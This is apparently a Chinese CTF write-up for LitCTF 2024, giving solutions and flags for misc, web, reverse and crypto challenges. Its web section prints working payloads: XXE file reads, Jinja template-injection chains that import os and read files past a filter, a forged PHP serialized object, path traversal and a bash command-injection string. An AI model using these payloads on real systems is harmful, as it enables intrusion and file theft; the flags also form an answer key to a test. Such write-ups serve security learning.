LitCTF 2024(公开赛道)——WP

目录

Misc

涐贪恋和伱、甾―⑺dé毎兮毎秒

你说得对,但__

盯帧珍珠

Everywhere We Go

关键,太关键了!

女装照流量

原铁,启动!

舔到最后应有尽有

The love

Web

exx

一个....池子?

SAS - Serializing Authentication System

浏览器也能套娃?

高亮主题(划掉)背景查看器

百万美元的诱惑

Reverse

编码喵

Crypto

common_primes


Misc

涐贪恋和伱、甾―⑺dé毎兮毎秒

题目只给了一张图片,zsteg秒了,flag:LitCTF{e8f7b267-9c45-4c0e-9d1e-13fc5bcb9bd6}

你说得对,但__

题目只给了一个png文件,是个二维码

直接扫描得到云·原神(原神哈哈哈哈哈!!!)

将图片放到010里面发现文件头为jpg格式的,修改后缀后进行分离(可使用binwalk或者foremost)

得到四部分不完整的二维码,猜测拼接后扫描

扫描后得到flag:LitCTF{Genshin_St@rt!!}

盯帧珍珠

题目给了一张jpg图片,放到010里面发现文件头为gif格式的,修改后缀后使用工具分离得到一堆图片,在其中可以发现组成flag的部分

最终的flag为:LitCTF{You_are_really_staring_at_frames!}

Everywhere We Go

题目只给了一个音频文件secret.wav,放入Audacity查看一下,切换到频谱图,放大后发现flag:flag{Calculate_Step_By_Step}

即:LitCTF{Calculate_Step_By_Step}

关键,太关键了!

题目给了两个文本flag.txt和key.txt,根据题目提示,将key.txt内容字频统计一下可以到一个暂定的key:bingo

题目名叫关键,猜测为关键字解密,用随波逐流秒了,flag:LitCTF{i_miss_you_boss}

女装照流量

我们拿到一个流量包,首先查看它的http流

发现很多上传文件的流量,分析过后得到关键信息(注意:因为蚁剑的流量为url编码+base64混淆。我们需要先进行url解密,在进行base解密)

通过上述流量我们可以得到密钥key:PaSsw0rd_LitCtF_L0vely_tanJi

分析过程如下:

Y2QgL2QgIkM6XFxQcm9ncmFtIEZpbGVzXFxwaHBzdHVkeV9wcm9cXFdXV1xcTGl0Q1RGLXBjYXBuZyImemlwIC1QICJQYVNzdzByZF9MaXRDdEZfTDB2ZWx5X3RhbkppIiBmMWFnLnppcCBmbGFnLnBocCZlY2hvIDFhOTI1JmNkJmVjaG8gNmZmZWIx     #属于蚁剑的流量特征,这里需要我们删除流量信息中的前两个字符后才能得到无混淆base64。
base64解密后得到
cd /d "C:\\Program Files\\phpstudy_pro\\WWW\\LitCTF-pcapng"&zip -P "PaSsw0rd_LitCtF_L0vely_tanJi" f1ag.zip flag.php&echo 1a925&cd&echo 6ffeb1

这个流量包的信息是

QzovUHJvZ3JhbSBGaWxlcy9waHBzdHVkeV9wcm8vV1dXL0xpdENURi1wY2FwbmcvZjFhZy56aXA=
base64解密后得到
C:/Program Files/phpstudy_pro/WWW/LitCTF-pcapng/f1ag.zip     #说明这里有一个zip文件

我们将其提取出来发现需要密码,用前面分析得到key即可进行解压缩,得到flag:LitCTF{anTsw0rd_fl0w_is_eAsY_f0r_u}

<?php $flag = "LitCTF{anTsw0rd_fl0w_is_eAsY_f0r_u}";

原铁,启动!

一眼丁真,对照后得到flag:LitCTF{good_gamer}

舔到最后应有尽有

base64隐写,PuzzleSolver秒了,flag:LitCTF{TanJi_j1e_jie_n1_dAi_w0_z0u_b_}

The love

题目给了一张图片和一个音频文件,将图片放入010发现尾部有 Litctf??????ftctiL 并发现PK字样

这里肯定是分离得到zip文件,然后进行掩码攻击了,得到密钥:Litctf202405ftctiL

解压后得到一个假的flag.txt,和一个含有base字符串的password.txt

flag{这是假的!!!就像爱情_以为得到了_还是得不到}
​
Ykc5MlpWOXBjMTl3WVdsdVpuVnM=
base64解密:bG92ZV9pc19wYWluZnVs
base64解密:love_is_painful

最后的key为:love_is_painful

用deepsound解密音频后得到flag_real.txt,最终的flag为:Litctf{wish_you_can_find_your_true_love}

Web

exx

题目给了一个登录页面,随便输入账号密码(admin,123456),burp抓包

根据题目描述,这题考点xxe没跑了

#payload如下
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "php://filter/resource=/flag">     #利用php协议读取/flag
]>
<user><username>
&xxe;                                                    #调用xxe,执行语句"php://filter/resource=/flag"
</username><password>123456</password></user>

一个....池子?

首先随便输入123,返回结果是123

接着我们尝试输入{{3*3}},返回结果为9

标准的ssti模版注入,我们首先查看一下app.py(最好用burp抓包显示,看起来方便)

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

可以在里面找到waf,过滤了一些字符。我们可以用字符串拼接的方式绕过waf

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

找到了flag文件,字符串拼接读取flag(flag不拼接也可以,没过滤flag,我这里套的模版)

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/fl'+'ag','r').read()}}{% endif %}{% endfor %}

SAS - Serializing Authentication System

题目如下

 
#密钥许可规则
​
<?php
class User {
    public $username;
    public $password;
    function __construct($username, $password) {
        $this->username = $username;
        $this->password = $password;
    }
    function isValid() { return $this->username === 'admin' && $this->password === 'secure_password'; }
}
​
​这个PHP代码定义了一个名为 User 的类,并包括以下几个部分:
属性:
$username:公共属性,用于存储用户名。
$password:公共属性,用于存储密码。
构造函数:
__construct($username, $password):这是类的构造函数,接受两个参数(用户名和密码)。构造函数在创建对象时被自动调用,初始化 username 和 password 属性。
​
方法:
isValid():这个方法用于验证用户名和密码是否匹配预定义的值。它返回一个布尔值(true 或 false)。在这个示例中,当 username 为 'admin' 且 password 为 'secure_password' 时,返回 true,否则返回 false。

分析过后编写poc,如下

<?php
class User {
    public $username;
    public $password;
    function __construct($username, $password) {
        $this->username = $username;
        $this->password = $password;
    }
    function isValid() {
        return $this->username === 'admin' && $this->password === 'secure_password';
    }
}

$user = new User('admin', 'secure_password');
echo base64_encode(serialize($user));
?>
#在主代码中,创建了一个新的User对象,用户名为'admin',密码为'secure_password'。然后,使用serialize()函数将该对象序列化为字符串,并使用base64_encode()函数对其进行编码。

运行后得到payload:

Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=

浏览器也能套娃?

题目如下

直接在输入框中读取flag即可,这里使用PHP伪协议

php://filter/resource=/flag

 

高亮主题(划掉)背景查看器

题目如下

 
<?php
// 文件包含漏洞演示
if (isset($_GET['url'])) {
    // 读取并包含用户输入的文件
    $file = $_GET['url'];
    if (strpos($file, '..') === false) {
        include $file;
    } else {
        echo "Access denied.";
    }
} else {
    echo "No file specified.";
}
?>

分析过后,其实就是一个简单的文件包含theme=theme1.php,burp抓包修改请求方式为post

先ls看一下,没发现什么重要的信息,猜测flag在根目录或者更高级目录

目录穿越一下,得到flag

theme=../../../../flag

百万美元的诱惑

这个题目有两层,第一层

第一层payload如下

?a[]=1&b[]=2&c=2025a

访问dollar.php,来到第二层

第二层payload如下

?x=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

查看源码后得到flag

Reverse

编码喵

查壳后64位,放入ida

shift+f12,发现一串base64密文,和一个解密映射表(base64换表解密)

 
tgL0q1rgEZaZmdm0zwq4lweYzgeTngfHnI1ImMm5ltaXywnLowuYnJmWmx0=      #密文
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/  #映射表

赛博橱子秒了,flag:LitCTF{03034ed8-a2da-4aa6-b2c9-01ace9e26301}

Crypto

common_primes

#info

from Crypto.Util.number import *
from secret import flag

m = bytes_to_long(flag)
e = 65537
p = getPrime(512)
q1 = getPrime(512)
q2 = getPrime(512)
n1 = p * q1
n2 = p * q2
c1 = pow(m, e, n1)
c2 = pow(m, e, n2)

print(f"n1 = {n1}")
print(f"n2 = {n2}")
print(f"c1 = {c1}")
print(f"c2 = {c2}")

'''
n1 = 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769
n2 = 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573
c1 = 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252
c2 = 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420
'''
#exp

import libnum
import gmpy2


e= 65537
n1= 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769
n2= 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573
c1= 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252
c2= 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420


#求最大公约数
q=gmpy2.gcd(n1,n2)
p1=n1//q

phi_n=(q-1)*(p1-1)
#求逆元d
d1=libnum.invmod(e,phi_n)
m=pow(c1,d1,n1)
print("m=",m)
#数字转字节,转字符串
print(libnum.n2s(int(m)).decode())
#output

m= 38001428468493606140291085290464475306493666574265620008311218108580381088400212852503677
LitCTF{c0mmunity_w1th_two_ciphert3xt}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/671241.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

WSL2-Ubuntu22.04-配置

WSL2-Ubuntu22.04-配置 准备1. WSL相关命令[^1]2. WSL2-Ubuntu22.04可视化3. WSL2 设置 CUDA4. 设置OpenGL 本文介绍了WSL2的基本使用方法及可视化&#xff0c;着重介绍了GPU和OpenGL的设置。 准备 名称版本windows11wsl2CUDA12.5 1. WSL相关命令1 查看已安装的wsl distribut…

大话C语言:第21篇 数组

1 数组概述 数组是若干个相同类型的变量在内存中有序存储的集合。 数组是 C 语言中的一种数据结构&#xff0c;用于存储一组具有相同数据类型的数据。 数组在内存中会开辟一块连续的空间 数组中的每个元素可以通过一个索引&#xff08;下标&#xff09;来访问&#xff0c;索…

网上帮别人开网店卖货的骗局!

小红书帮别人开店卖货的骗局主要涉及到一些不法分子利用小红书平台的流量和用户信任度&#xff0c;通过虚假宣传、承诺高额利润等手段&#xff0c;诱骗用户开店并**所谓的“赚钱机会”。 这些骗局往往以“轻松创业、快速致富”为诱饵&#xff0c;吸引那些对创业充满热情但缺乏经…

汽美汽修店管理系统会员小程序的作用是什么

汽车后市场汽美汽修赛道同样存在着大量商家&#xff0c;连锁品牌店或个人小店等&#xff0c;门店扎堆且区域覆盖面积广&#xff0c;当然每天车来车往也有不少生意。 随着线上化程度加深和商家不断拓展市场的需要&#xff0c;传统运营模式可能难以满足现状&#xff0c;尤其是年…

多个短视频剪辑成一个视频:四川京之华锦信息技术公司

多个短视频剪辑成一个视频&#xff1a;创作中的艺术与技术 在数字时代&#xff0c;短视频以其短小精悍、内容丰富的特点&#xff0c;迅速成为社交媒体上的热门内容形式。然而&#xff0c;有时单一的短视频难以完全表达创作者的意图或满足观众的观赏需求。因此&#xff0c;将多…

【Qt秘籍】[009]-自定义槽函数/信号

自定义槽函数 在Qt中自定义槽函数是一个直接的过程&#xff0c;槽函数本质上是类的一个成员函数&#xff0c;它可以响应信号。所谓的自定义槽函数&#xff0c;实际上操作过程和定义普通的成员函数相似。以下是如何在Qt中定义一个自定义槽函数的步骤&#xff1a; 步骤 1: 定义槽…

springboot+vue+mybatis博物馆售票系统+PPT+论文+讲解+售后

如今社会上各行各业&#xff0c;都喜欢用自己行业的专属软件工作&#xff0c;互联网发展到这个时候&#xff0c;人们已经发现离不开了互联网。新技术的产生&#xff0c;往往能解决一些老技术的弊端问题。因为传统博物馆售票系统信息管理难度大&#xff0c;容错率低&#xff0c;…

高速模拟信号链的设计学习

目录 概述&#xff1a; 定义&#xff1a; 断开&#xff1a; 链路设计&#xff1a; 结论&#xff1a; 概述&#xff1a; 由于对共模参数及其与设备之间的关联缺乏了解&#xff0c;客户仍然会提出许多技术支持问题。ADC数据表指定了模拟输入的共模电压要求。关于这方面没有太…

物联网实战--平台篇之(十二)设备管理前端

目录 一、界面演示 二、设备列表 三、抖动单元格 四、设备模型 五、设备编辑 本项目的交流QQ群:701889554 物联网实战--入门篇https://blog.csdn.net/ypp240124016/category_12609773.html 物联网实战--驱动篇https://blog.csdn.net/ypp240124016/category_12631333.htm…

彩灯控制器设计 74ls160+ne555实现

一、选题背景 数字电子技术在我们生活中的应用非常之广泛,不论是在各个方面都会涉及到它,小到家用电器的自动控制,大到神舟九号和天空一号航天器的设计,都无可避免的要运用它。并且鉴于以理论推动实践及理论实践相结合为指导思想,特此用我们所学的理论知识来实践这次课程设…

Nginx编译安装,信号,升级nginx

编译安装nginx&#xff1a;前面博客有写编译安装过程 systemctl stop firewalld setenforce 0 mkdir /data cd /data wget http://nginx.org/download/nginx-1.18.0.tar.gz tar xf nginx-1.18.0.tar.gz cd nginx-1.18.0/ yum -y install make gcc pcre-devel openssl-devel …

数据结构与算法03-散列表(哈希表)

介绍 散列表&#xff08;Hash table&#xff0c;也叫哈希表&#xff09;&#xff0c;是根据键&#xff08;Key&#xff09;而直接访问在存储器存储位置的数据结构。也就是说&#xff0c;它通过计算出一个键值的函数&#xff0c;将所需查询的数据映射到表中一个位置来让人访问&…

项目质量管理

目录 1.概述 2.三个关键过程 2.1.规划质量管理&#xff08;Plan Quality Management&#xff09; 2.2.管理质量&#xff08;Manage Quality&#xff09; 2.3.控制质量&#xff08;Control Quality&#xff09; 3.应用场景 3.1.十个应用场景 3.2.产品设计与开发 4.小结…

【自动驾驶技术】自动驾驶汽车AI芯片汇总——地平线篇

0. 前言 按照国际惯例&#xff0c;首先声明&#xff1a;本文只是我自己学习的理解&#xff0c;虽然参考了他人的宝贵见解及成果&#xff0c;但是内容可能存在不准确的地方。如果发现文中错误&#xff0c;希望批评指正&#xff0c;共同进步。 本篇文章是这个系列的第二篇&#x…

微信小程序毕业设计-书橱系统项目开发实战(附源码+论文)

大家好&#xff01;我是程序猿老A&#xff0c;感谢您阅读本文&#xff0c;欢迎一键三连哦。 &#x1f49e;当前专栏&#xff1a;微信小程序毕业设计 精彩专栏推荐&#x1f447;&#x1f3fb;&#x1f447;&#x1f3fb;&#x1f447;&#x1f3fb; &#x1f380; Python毕业设计…

[C][栈帧]详细讲解

目录 1.栈帧1.进程地址空间2.栈帧说明 2.认识相关寄存器3.认识相关汇编命令4.过程理解5.栈帧总结6.补充 1.栈帧 1.进程地址空间 .进程地址空间 2.栈帧说明 调用函数&#xff0c;形成栈帧函数返回&#xff0c;释放栈帧局部变量是存放在栈区上的栈区内存的使用习惯是&#xff…

数据结构之实现“通讯录”

大家先赞后看&#xff0c;养成好习惯 你们的点赞和关注还有收藏就是我的动力&#xff01;&#xff01;&#xff01; 目录 前言 一、通讯录文件的创建和联系人结构体定义 1.1 文件创建 1.2 联系人结构体定义 二、通讯录的功能实现 2.1通讯录初始化 2.2通讯录销毁 2.3添…

使用手机小程序给证件照换底色

临时遇到一个需求&#xff0c;需要给证件照换底色。原始图像如下 最终需要换成红底的。 本次使用一款小程序&#xff02;泰世茂证件照&#xff02;&#xff0c;打开该小程序&#xff0c;如下图所示 单击开始制作&#xff0c;然后选择二寸红底&#xff0c;如下图所示 然后单击相…

【AIGC时代】探索AIGC的无限可能:释放你的创意,定制你的视觉世界

前言 在数字时代的浪潮中&#xff0c;我们的视觉体验正在经历前所未有的变革。随着科技的飞速发展&#xff0c;我们不再满足于传统的图片制作方式&#xff0c;而是渴望拥有更具创意、更富个性的视觉呈现。在这样的背景下&#xff0c;AIGC&#xff08;人工智能生成内容&#xf…

IF:83.5!一作兼通讯,​Nature系列综述:可以吃的机器人!

在当今科技与生物工程快速融合的时代&#xff0c;传统领域之间的界限正在逐渐模糊&#xff0c;创造了许多前所未有的创新机会。机器人设计与食品加工这两个看似无关的研究领域&#xff0c;正在通过材料特性、制造工艺和功能的交叉融合&#xff0c;展现出巨大的潜力。 可食用机器…